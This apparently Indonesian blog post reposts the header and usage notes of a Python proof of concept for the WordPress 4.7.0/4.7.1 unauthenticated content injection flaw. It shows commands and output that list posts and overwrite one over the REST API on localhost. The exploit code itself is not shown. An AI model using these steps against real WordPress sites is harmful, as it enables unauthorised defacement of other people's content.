WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)
Yahoo kawan, kali ini saya akan berbagi sebuah exploit yang sesusai judulnya. Yap langsung ajah di simak ya ^_^# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC# Date: 2017-02-02# Exploit Author: @leonjza# Vendor Homepage: https://wordpress.org/# Software Link: Download here# Version: Wordpress 4.7.0/4.7.1# Tested on: Debian Jessie## PoC gist: Here## 2017 - @leonjza## Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC# Full bug description: Read here
Usage example:List available posts:
## $ python inject.py http://localhost:8070/# * Discovering API Endpoint# * API lives at: http://localhost:8070/wp-json/# * Getting available posts# - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1#Update post with content from a file:## $ cat content# foo## $ python inject.py http://localhost:8070/ 1 content# * Discovering API Endpoint# * API lives at: http://localhost:8070/wp-json/# * Updating post 1# * Post updated. Check it out at http://localhost:8070/archives/1# * Update complete!
Tool:Sekian terima kasih, jika ada kesalahan kata mohon maaf ^_^. We just shared not claimer ^_^Special Thank for : @leonjzaSource/original post: Here 
